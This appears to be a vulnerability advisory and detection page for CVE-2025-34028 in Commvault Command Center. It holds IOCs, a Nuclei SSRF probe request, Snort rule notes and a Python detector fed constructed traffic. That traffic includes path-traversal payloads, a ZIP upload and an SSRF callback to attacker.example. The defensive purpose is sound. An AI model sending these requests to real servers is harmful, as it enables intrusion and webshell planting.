CVE-2025-34028
published 2025-04-22

Priority: P1 (100) · Severity: critical · CVSS 3.1 base score: 10.0
CVSS 3.1 vector: AV:N / AC:L / PR:N / UI:N / S:C / C:H / I:H / A:H
Tags: KEV, ITW, EXPLOIT, Initial access
CISA Known Exploited Vulnerability (due 2025-05-23)
Exploited in the wild
EPSS: 97.16% (99.9th percentile)
The Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files that represent install packages. When expanded by the target server, these packages are subject to a path traversal that can result in Remote Code Execution via a malicious JSP. This issue affects Command Center Innovation Release 11.38.0 to 11.38.20. The vulnerability is fixed in 11.38.20 with SP38-CU20-433 and SP38-CU20-436, and also in 11.38.25 with SP38-CU25-434 and SP38-CU25-438.

Affected (2 ranges)

Vendor      Product                             Version range            Fixed in
commvault   command_center_innovation_release   11.38.0 – 11.38.25
commvault   commvault                           >= 11.38.0, < 11.38.20   11.38.20

Detection & IOCs (extracted from sources)

url:     /commandcenter/deployWebpackage.do
url:     /commandcenter/deployServiceCommcell.do
path:    /reports/MetricsUpload/*.jsp
other:   fofa-query: icon_hash="1209838013"
command: Nuclei probe request

  POST /commandcenter/deployWebpackage.do HTTP/1.1
  Host: {{Hostname}}
  X-Requested-With: XMLHttpRequest
  Content-Type: application/x-www-form-urlencoded

  commcellName={{interactsh-url}}&servicePack={{string}}&version=x
  • Unauthenticated POST requests to /commandcenter/deployWebpackage.do whose body carries the parameters commcellName, servicePack and version are the SSRF/RCE entry point. Path traversal sequences in servicePack (../ or URL-encoded equivalents) are the exploit trigger.
  • Unauthenticated POST requests to /commandcenter/deployServiceCommcell.do that upload a ZIP file (magic bytes PK) as a multipart body containing a servicePack field with path traversal sequences and a file part with a .zip filename.
  • Post-exploitation webshell access shows up as HTTP requests to URIs matching /reports/MetricsUpload/*.jsp; monitor for .jsp access under this path following any exploit attempt.
  • The Nuclei probe checks for an HTTP 900 status code in the response to the SSRF probe against /commandcenter/deployWebpackage.do; status code 900 is a strong indicator of a vulnerable Commvault instance.
  • Use FOFA icon hash 1209838013 to identify internet-exposed Commvault Command Center instances for asset discovery and attack-surface monitoring.
  • The X-Requested-With: XMLHttpRequest header is present in exploit requests to /commandcenter/deployWebpackage.do; include it in detection logic to reduce false positives.
  • The Snort/ET rules for deployServiceCommcell.do (sid:2061838) and deployWebpackage.do (sid:2061837) require TLS decryption (tls_state TLSDecrypt) to be effective against HTTPS traffic; without TLS inspection, encrypted sessions are a blind spot.
  • The post-exploitation webshell rule (sid:2061839) uses an xbits:isset check tied to prior exploit detection (ET.CVE-2025-34028) and only fires if the initial exploit attempt was also detected within the same session-tracking window (120 seconds). Standalone webshell access without a preceding detected exploit is missed.
  • The vulnerability affects only Command Center Innovation Release versions 11.38.0 through 11.38.20; fixed builds are 11.38.20 with SP38-CU20-433/SP38-CU20-436 and 11.38.25 with SP38-CU25-434/SP38-CU25-438. Scope detections to unpatched instances.
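The detection logic described in the bullets above, run over a few constructed HTTP transactions, as an added Python example. This is not code from the page's sources, from Commvault, or from the ET/Nuclei rule authors. The transaction record schema, the alert tag names, the sample IP addresses and the multipart body are all assumptions made for the example. Unlike the ET xbits rule, it always alerts on .jsp access under /reports/MetricsUpload/ and adds a second, correlated alert when the same source raised a traversal alert within the 120-second window, so the standalone-webshell gap in the previous bullet is visible in the output.

```python
import re
from urllib.parse import parse_qs, unquote

DEPLOY_WEBPACKAGE = "/commandcenter/deployWebpackage.do"            # IOC from the list above
DEPLOY_SERVICECOMMCELL = "/commandcenter/deployServiceCommcell.do"  # IOC from the list above
WEBSHELL_RE = re.compile(r"^/reports/MetricsUpload[^?]*\.jsp(\?.*)?$", re.IGNORECASE)
TRAVERSAL_RE = re.compile(r"\.\.[/\\]")
CORRELATION_WINDOW = 120  # seconds, the same window the ET xbits webshell rule uses


def has_traversal(value):
    """True if value holds ../ or ..\\ after up to three percent-decoding passes."""
    for _ in range(3):
        if TRAVERSAL_RE.search(value):
            return True
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return bool(TRAVERSAL_RE.search(value))


def parse_multipart(body, content_type):
    """Minimal multipart/form-data parser: one {name, filename, data} dict per part."""
    m = re.search(r'boundary="?([^";]+)"?', content_type)
    if not m:
        return []
    parts = []
    for chunk in body.split(b"--" + m.group(1).encode())[1:]:
        if chunk.startswith(b"--"):  # closing delimiter
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        head = head.decode("latin-1")
        name = re.search(r'[;\s]name="([^"]*)"', head)
        fname = re.search(r'filename="([^"]*)"', head)
        parts.append({"name": name.group(1) if name else "",
                      "filename": fname.group(1) if fname else "",
                      "data": data.rstrip(b"\r\n")})
    return parts


def classify(tx):
    """Alert tags for one transaction. Assumed (hypothetical) record schema:
    {"ts": float, "src": str, "method": str, "path": str, "headers": dict, "body": bytes}."""
    tags = []
    hdrs = {k.lower(): v for k, v in tx["headers"].items()}
    ctype = hdrs.get("content-type", "")
    post = tx["method"].upper() == "POST"
    if post and tx["path"] == DEPLOY_WEBPACKAGE:
        params = parse_qs(tx["body"].decode("utf-8", "replace"), keep_blank_values=True)
        if {"commcellName", "servicePack", "version"} <= set(params):
            xhr = hdrs.get("x-requested-with") == "XMLHttpRequest"  # lowers false positives
            tags.append("deployWebpackage-probe" + ("-xhr" if xhr else ""))
            if any(has_traversal(v) for v in params["servicePack"]):
                tags.append("deployWebpackage-traversal")
    elif post and tx["path"] == DEPLOY_SERVICECOMMCELL and ctype.startswith("multipart/form-data"):
        parts = parse_multipart(tx["body"], ctype)
        sp_trav = any(p["name"] == "servicePack" and has_traversal(p["data"].decode("latin-1")) for p in parts)
        zip_up = any(p["filename"].lower().endswith(".zip") and p["data"].startswith(b"PK") for p in parts)
        if zip_up:
            tags.append("deployServiceCommcell-zip-traversal" if sp_trav else "deployServiceCommcell-zip-upload")
    elif WEBSHELL_RE.match(tx["path"]):
        tags.append("MetricsUpload-jsp-access")
    return tags


def scan(transactions):
    """Emit (ts, src, tag) alerts over a time-ordered list; webshell access always alerts,
    and is tagged again as correlated when the source raised a traversal alert in the window."""
    last_exploit, alerts = {}, []
    for tx in transactions:
        for tag in classify(tx):
            alerts.append((tx["ts"], tx["src"], tag))
            if tag.endswith("-traversal"):
                last_exploit[tx["src"]] = tx["ts"]
            elif tag == "MetricsUpload-jsp-access":
                t0 = last_exploit.get(tx["src"])
                if t0 is not None and tx["ts"] - t0 <= CORRELATION_WINDOW:
                    alerts.append((tx["ts"], tx["src"], tag + "-correlated"))
    return alerts


# Constructed sample traffic (not real captures): a full chain from 203.0.113.5, then an
# uncorrelated .jsp hit and a benign-looking deploy call from 198.51.100.9.
B = "----constructedboundary"
SAMPLE = [
    {"ts": 1000.0, "src": "203.0.113.5", "method": "POST", "path": DEPLOY_WEBPACKAGE,
     "headers": {"X-Requested-With": "XMLHttpRequest", "Content-Type": "application/x-www-form-urlencoded"},
     "body": b"commcellName=attacker.example&servicePack=..%2F..%2F..%2Freports%2FMetricsUpload%2F&version=x"},
    {"ts": 1010.0, "src": "203.0.113.5", "method": "POST", "path": DEPLOY_SERVICECOMMCELL,
     "headers": {"Content-Type": f"multipart/form-data; boundary={B}"},
     "body": (f'--{B}\r\nContent-Disposition: form-data; name="servicePack"\r\n\r\n../../../reports/MetricsUpload/\r\n'
              f'--{B}\r\nContent-Disposition: form-data; name="file"; filename="pkg.zip"\r\n\r\n').encode()
             + b"PK\x03\x04" + b"\x00" * 8 + f"\r\n--{B}--\r\n".encode()},
    {"ts": 1030.0, "src": "203.0.113.5", "method": "GET", "path": "/reports/MetricsUpload/x.jsp", "headers": {}, "body": b""},
    {"ts": 5000.0, "src": "198.51.100.9", "method": "GET", "path": "/reports/MetricsUpload/old.jsp", "headers": {}, "body": b""},
    {"ts": 5001.0, "src": "198.51.100.9", "method": "POST", "path": DEPLOY_WEBPACKAGE,
     "headers": {"Content-Type": "application/x-www-form-urlencoded"},
     "body": b"commcellName=cc01&servicePack=CU20&version=11.38.20"},
]
```

Calling scan(SAMPLE) yields seven alerts: the XHR probe and traversal alert for the first request, the ZIP-plus-traversal alert for the multipart upload, the .jsp access with its correlated twin, the uncorrelated .jsp access from the second source, and a plain probe tag for the deploy call without traversal or the XMLHttpRequest header. The percent-decoding loop in has_traversal is what keeps %2e%2e%2f and double-encoded variants from slipping past the check.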

CVSS provenance

Source      Version  Score  Severity  Vector
nvd         3.1      10.0   CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
nvd         4.0      9.3    CRITICAL  CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vulncheck            9.3    CRITICAL
cisa                 9.3    CRITICAL